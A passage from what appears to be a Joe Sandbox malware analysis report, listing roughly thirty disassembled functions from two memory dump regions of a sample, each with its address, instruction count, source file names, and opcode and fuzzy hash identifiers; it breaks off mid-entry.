                                                  Function 00007FFAAC6D0D01 Relevance: .2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4c329470076dc1501780e4ab8b25f7e96f4fc7004bf9d782b2d74c9d77f9e41
                                                  • Instruction ID: 768bc7ca6925ee8c1eb37f9809d8f2b0d1cff24138c9bbd20f0b215f9ead0371
                                                  • Opcode Fuzzy Hash: b4c329470076dc1501780e4ab8b25f7e96f4fc7004bf9d782b2d74c9d77f9e41
                                                  • Instruction Fuzzy Hash: 9351913090EA49CFFB96DF18D851BB97BE0EF56310F1460BBE40DC71A1DA24A809C791
                                                  Function 00007FFAACA82B6C Relevance: .2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e991a1f8db785b73b73aa2e148b28ee23f3fb82239fb7ac4e12bf64e5c790527
                                                  • Instruction ID: b68a1163bb4c4156113b30abea426724ec71c4f450ab5c69eb7807b0de4653b6
                                                  • Opcode Fuzzy Hash: e991a1f8db785b73b73aa2e148b28ee23f3fb82239fb7ac4e12bf64e5c790527
                                                  • Instruction Fuzzy Hash: DF41C5B1A2E7468BF36C5B18684507577D2EF67750B24863ED48FC3192E918E90A43C6
                                                  Function 00007FFAAC6D0BFC Relevance: .1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48bb0310d86611a60030fda6382a5a98dcf5ef6984a65e04f1a4a45be2663264
                                                  • Instruction ID: 85ee36a2b04b228ce3eb2453544e3a275c68341f23af022fa4f7b84c75e639f0
                                                  • Opcode Fuzzy Hash: 48bb0310d86611a60030fda6382a5a98dcf5ef6984a65e04f1a4a45be2663264
                                                  • Instruction Fuzzy Hash: 0F419171D0EA8ACFFB47DB68D4616EC7BB0EF06314F146077D04ED7292DA29A8098790
                                                  Function 00007FFAACA85E98 Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edcdce35640564e816c76a99dada6a6e77102ff530dde9c36ef93af8a03abc5a
                                                  • Instruction ID: a7811ada418996cb5c4772bfbf4198283967210be4dc5407ac57eed4161ff0bb
                                                  • Opcode Fuzzy Hash: edcdce35640564e816c76a99dada6a6e77102ff530dde9c36ef93af8a03abc5a
                                                  • Instruction Fuzzy Hash: 23319573D1EAA69BFB02AB7CA8B14F97BE1EF02214B048172D45EC6293FD15950D43E1
                                                  Function 00007FFAAC6C6187 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eed2769244a4e15273665935ce2c0fc582f2b726ef697c8d7a8f6b701d5a5a33
                                                  • Instruction ID: 3936ed5850dd085ee2b7aaee65423f43fb7410cd4786b7ecf5c61d516c3aad2b
                                                  • Opcode Fuzzy Hash: eed2769244a4e15273665935ce2c0fc582f2b726ef697c8d7a8f6b701d5a5a33
                                                  • Instruction Fuzzy Hash: 98413032A0C9488FDB89EF5CC496DB4B7E1FF6932070455AAE04FC3596DE24E849CB81
                                                  Function 00007FFAACA852C7 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb03ccea7f2271ea7b623e5f1c4bcd0131438cccb94551dd1194fa6f81653b5c
                                                  • Instruction ID: 4cb9d112394631c85fa4816d7b1aafddd9eb1ffae305d80d602a5a27c519ccf6
                                                  • Opcode Fuzzy Hash: cb03ccea7f2271ea7b623e5f1c4bcd0131438cccb94551dd1194fa6f81653b5c
                                                  • Instruction Fuzzy Hash: A541623161CE48CFEF88EB18D455EB5B7E1FB6932470441AAD04EC3196DE34E945CB81
                                                  Function 00007FFAACA8CDB7 Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e37bdf44fd0319d57118bd9c07c02fed58a02a3339c02a5356f7f0e31892c5c7
                                                  • Instruction ID: 80f3a5ca687294a05934127d126d663c1b8e704df332f6e70261a4cacb492437
                                                  • Opcode Fuzzy Hash: e37bdf44fd0319d57118bd9c07c02fed58a02a3339c02a5356f7f0e31892c5c7
                                                  • Instruction Fuzzy Hash: 6441823261C948CFDF88EB28D496EB477E1FB6A314B1441A9D04FC3292DE35E845CB81
                                                  Function 00007FFAAC6CEB67 Relevance: .1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12638f927a8619ef562269622e1d8bce44811fef049658fe201eb91ebab60350
                                                  • Instruction ID: c950f0484e44aa4d61874cb80ee70975542eedcfbabd50d514bda024be92989d
                                                  • Opcode Fuzzy Hash: 12638f927a8619ef562269622e1d8bce44811fef049658fe201eb91ebab60350
                                                  • Instruction Fuzzy Hash: 05419F3160C948CFDF89EB28D4A59A5B7F1FB69320B0442AAD01FD3696CE24E845CB91
                                                  Function 00007FFAAC6C6231 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41b218be92c400d3b4b0dadb28ee2a0d5dfba54143a9db77b5f53a769a1cf9d7
                                                  • Instruction ID: 48b59471d7075eb488a146ed7a3c8307f95bcda7ac5b25c14caa24743d179c19
                                                  • Opcode Fuzzy Hash: 41b218be92c400d3b4b0dadb28ee2a0d5dfba54143a9db77b5f53a769a1cf9d7
                                                  • Instruction Fuzzy Hash: C2313F31A1CA488FDB99EF2CC495DB4B7E1FB6931070446AAE05FC7596CE24E885CB81
                                                  Function 00007FFAACA85371 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fb800d021fab9aeaa03a2656d8d10e0807023046e354ecf945f3731397b1644
                                                  • Instruction ID: bf04f7dec0deb0e5e0a5c001e69520d7d8d4cfb774cf377305116a43f62399e1
                                                  • Opcode Fuzzy Hash: 5fb800d021fab9aeaa03a2656d8d10e0807023046e354ecf945f3731397b1644
                                                  • Instruction Fuzzy Hash: 59318F31618E48CFEB8CEB28C455EB5B7E2FB6A31470442AAD05EC7196DE34E845CB81
                                                  Function 00007FFAACA8CE61 Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d3bbe1e13d68cd0e010400f52e77e7de7ff1f7d28d7cba6fcd6c54d41900b51
                                                  • Instruction ID: d29ecb8f3c5ae360a195e150551cdbfd86994eb7e7e61d654125bf56a3f28244
                                                  • Opcode Fuzzy Hash: 7d3bbe1e13d68cd0e010400f52e77e7de7ff1f7d28d7cba6fcd6c54d41900b51
                                                  • Instruction Fuzzy Hash: 7E317E3261CA488FDB88EB28C095E7477E1FBAA31471441ADD04FC7296DE28E845CB82
                                                  Function 00007FFAAC6CEC11 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34420c5ba80e20e1aa3dc3680391f0bcc0d98f67b534bdfcde6d916527092514
                                                  • Instruction ID: 2f4df8d9f33a3ccf472b37f8948fc9e10d134bba01da6bcc84f4465ae0b4a0fa
                                                  • Opcode Fuzzy Hash: 34420c5ba80e20e1aa3dc3680391f0bcc0d98f67b534bdfcde6d916527092514
                                                  • Instruction Fuzzy Hash: C6319F3160CE448FDB8AEF28C4A5EA4B7F1FB6931470442AED01FD7696CE24E845CB91
                                                  Function 00007FFAAC6C61CB Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38c69d65a2d2ee7209326fe9f95581afef9604b9c1b9fd76fcc399dadd13d51b
                                                  • Instruction ID: dcf4aabf9798d5efe269d157b1462c89ae104cb0ba32557b13ee83703c721589
                                                  • Opcode Fuzzy Hash: 38c69d65a2d2ee7209326fe9f95581afef9604b9c1b9fd76fcc399dadd13d51b
                                                  • Instruction Fuzzy Hash: 71313C31A0CA498FDB99EF6CC495DB4B7E1FB6931070445AAE04FC7696CE24E885CB81
                                                  Function 00007FFAACA8530B Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c4ff6914b566e21aeb02b76f14cf806ef192936df7d2a88682c84766ef07585
                                                  • Instruction ID: 0719b922ae3849380bce24f3f6ad8773d9ac927b261c640380d2498dd2363dd4
                                                  • Opcode Fuzzy Hash: 2c4ff6914b566e21aeb02b76f14cf806ef192936df7d2a88682c84766ef07585
                                                  • Instruction Fuzzy Hash: B3316F31618E49CFEB88EB28C455EB5B7E2FB6A31470441A9D04EC7196DE38E845CB81
                                                  Function 00007FFAACA8CDFB Relevance: .1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b92826a4c10cc9f6f90c812056cd51bfcbd0dfcd521bd52d11470fbf9e9f4de5
                                                  • Instruction ID: d6f6ad848e5a01642c959bb227f34e31741559224a11e4167e0bfbee019cdc50
                                                  • Opcode Fuzzy Hash: b92826a4c10cc9f6f90c812056cd51bfcbd0dfcd521bd52d11470fbf9e9f4de5
                                                  • Instruction Fuzzy Hash: 3E314F3261C949CFDB98EF28C095EB477E1FB6A31471441A9D04FC7696DE38E885CB81
                                                  Function 00007FFAAC6CEBAB Relevance: .1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2afeea5f9a28e00fd02de66fc775b5d123143041fa54a36eb79d4816c135cf9
                                                  • Instruction ID: decb9808f5bc9d41e7e98209df4a1fe230ccb2936700a4bd2ee6cce4e79f2be9
                                                  • Opcode Fuzzy Hash: e2afeea5f9a28e00fd02de66fc775b5d123143041fa54a36eb79d4816c135cf9
                                                  • Instruction Fuzzy Hash: F7319C3160CD49CFDB89EB28C4A5AA5B7F1FB6931470442AED01FD3696CE24E845CB81
                                                  Function 00007FFAAC6C17D9 Relevance: .1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67537462a96866e48073080c855983467c463c8395f06b673d9673a20ec7386b
                                                  • Instruction ID: 3372440402ee8fb6f146b5da9bfbe6cc1a4abc2f00bd65cf28ee0fda5b3b31ae
                                                  • Opcode Fuzzy Hash: 67537462a96866e48073080c855983467c463c8395f06b673d9673a20ec7386b
                                                  • Instruction Fuzzy Hash: B9317E3490D64DDFEBA6DB58C8516FD7BA0FB59300F10516AE00EE7290CA349918CB91
                                                  Function 00007FFAAC6CA0F4 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69682bf409a6093274b694f0021c6cb98898ba0de7c36227545e58cc2a6c6843
                                                  • Instruction ID: 146409e588d3252eeecfa7baafe2a08b21ad94a92f73bcf19122000ad8ce274e
                                                  • Opcode Fuzzy Hash: 69682bf409a6093274b694f0021c6cb98898ba0de7c36227545e58cc2a6c6843
                                                  • Instruction Fuzzy Hash: C4316D7191E689CFEB87DB68C8605EC7BB1FF46304F1451BAD04EE7293DA24A809C791
                                                  Function 00007FFAAC6CE975 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41728cdc15da75f1d62b4f92e74c942270e551cafc854edee41e786c48b6b6ae
                                                  • Instruction ID: 6d0c29fdbeb60090c76bc9609b36f9ba930ed831715ecba889e6683a1be12be4
                                                  • Opcode Fuzzy Hash: 41728cdc15da75f1d62b4f92e74c942270e551cafc854edee41e786c48b6b6ae
                                                  • Instruction Fuzzy Hash: 6B315D3091E94ACFFBABDB94C4955BD77B1FF46300F5460BAE02ED2181DA38A90887C1
                                                  Function 00007FFAAC6C10DD Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7062088173baae71c51649ea81feac93f38d913c7db2bc3fafeb1aa4160eb78
                                                  • Instruction ID: 1e319426eb2827d5803bce06c870391e830dccdd68bbe1d527762bd21ee28f04
                                                  • Opcode Fuzzy Hash: b7062088173baae71c51649ea81feac93f38d913c7db2bc3fafeb1aa4160eb78
                                                  • Instruction Fuzzy Hash: E431E77090E6858FEB46DB68C4959A57B919F53310B18C2FAD01DCF2A7D92CEC4AC3C1
                                                  Function 00007FFAACA850D5 Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89d6244781562d945152466087f72d1ac757cce6bb500e104b5b0eec7be3afa3
                                                  • Instruction ID: a9b65b357e079197b084657e18e9e532f178ece69881e0786d8285145ce66f2f
                                                  • Opcode Fuzzy Hash: 89d6244781562d945152466087f72d1ac757cce6bb500e104b5b0eec7be3afa3
                                                  • Instruction Fuzzy Hash: 4E313D3192A94ACFFF98EF5494555BD77B2FF46300F5040BAD80EC2181EA38AA489B81
                                                  Function 00007FFAACA83FC0 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cde7f805bf162759008342320a68f6d3a1e2fd08514bbcbe677428ed3aaa0a5c
                                                  • Instruction ID: 2ddd37ba7cafaebc49173bf67efc3b55c25429b3bd7286c24d8b0eb301c69d41
                                                  • Opcode Fuzzy Hash: cde7f805bf162759008342320a68f6d3a1e2fd08514bbcbe677428ed3aaa0a5c
                                                  • Instruction Fuzzy Hash: 38312B2083D696CBF319C32858709727B72EB9321571886BAD08E8A48BDC1CE94987C1
                                                  Function 00007FFAACA8BAB0 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5a96a0b43deee17f47d72d06f8879d24bc9fe23b835b75d35f35c49486ccc4b
                                                  • Instruction ID: 1bc67a488f7d4a62410c1630af93e9a1ecc203c2e753c37dab058738fbe5492c
                                                  • Opcode Fuzzy Hash: c5a96a0b43deee17f47d72d06f8879d24bc9fe23b835b75d35f35c49486ccc4b
                                                  • Instruction Fuzzy Hash: 3F310A2192D596CFF32983146C659757B92EB53601B1885B9D08F8B4DBF81CE94D8381
                                                  Function 00007FFAAC6C5FAB Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bf46c259f0178fea38ec9f5efb729d83f67c334378ff74202b214b4b51472df
                                                  • Instruction ID: 1df7d943d491c4e7ab6bdd88d8b2868e86f6556a769185d2cec6a332fd9d231e
                                                  • Opcode Fuzzy Hash: 1bf46c259f0178fea38ec9f5efb729d83f67c334378ff74202b214b4b51472df
                                                  • Instruction Fuzzy Hash: D0313AB4A1D54ECAFB9BDF5885419BD77A0FF45301F10A07AD00EE2181CE38E9489AC5
                                                  Function 00007FFAACA8CBDA Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8797da0f1bc1f9aa6a023ceb93a577d0749a27505e3b544a4d611f6168e39281
                                                  • Instruction ID: bea8b224e776877ef0ef32883e4c07604b6559b812247d332901a338a19e6e36
                                                  • Opcode Fuzzy Hash: 8797da0f1bc1f9aa6a023ceb93a577d0749a27505e3b544a4d611f6168e39281
                                                  • Instruction Fuzzy Hash: 3E313EB292950ECBFB98DB5CA4415BD77B2FF46308F508076D00ED6581EF38AA489BC1
                                                  Function 00007FFAACA8D338 Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a40201f67175c86125212081ef5a870fde4b2a7786939425432e30629208de84
                                                  • Instruction ID: 26fe4be0813e7638c88a996d77d3819096e3a587449c5e538b8e08742bbc61a3
                                                  • Opcode Fuzzy Hash: a40201f67175c86125212081ef5a870fde4b2a7786939425432e30629208de84
                                                  • Instruction Fuzzy Hash: A2310730E2A50FCEEB98DB54A4555BD76A2FF4A700F50807AD00FD2191EF39A9489A81
                                                  Function 00007FFAAC6C4E80 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88739daa113a2506b07be92c08a354ae53b9817493f9d742718346d1090eec21
                                                  • Instruction ID: e3a69ff64d048d67d255a91e111b4fdf8ec4ecf7257931c9c490eead1d3ba23d
                                                  • Opcode Fuzzy Hash: 88739daa113a2506b07be92c08a354ae53b9817493f9d742718346d1090eec21
                                                  • Instruction Fuzzy Hash: CD31D41091E5D68AF75BC31884605B47B61AFD7200B18A6BAD4AECB4CBDD2CE8498391
                                                  Function 00007FFAAC6CD860 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3d50dd2cd11acb9b0d82d5170f2752bcb34c3b9c39929263cdf11ad7219ae98
                                                  • Instruction ID: c0521de2945ca47ad5b379b8c755a3414a98896da047e65126c85188457f7559
                                                  • Opcode Fuzzy Hash: f3d50dd2cd11acb9b0d82d5170f2752bcb34c3b9c39929263cdf11ad7219ae98
                                                  • Instruction Fuzzy Hash: 5E21E91091E5A69EF71BC31484645B47B75EF9331172896BAC09FCF4DBC82CE88993C1
                                                  Function 00007FFAAC6C5C4B Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b337e3c941454800e4df84625f29a734c4c64f16e1bdd5b5d8788c24093fc7be
                                                  • Instruction ID: 96e8998ceef79cebc5e00fad7760afeac8f5b2243e506692200c57b7a68f7a32
                                                  • Opcode Fuzzy Hash: b337e3c941454800e4df84625f29a734c4c64f16e1bdd5b5d8788c24093fc7be
                                                  • Instruction Fuzzy Hash: AD213C7190EB428BF36AD714E8416B1B7D0EF52350B40793EC49F87E92CA29F84687C1
                                                  Function 00007FFAACA81EC3 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
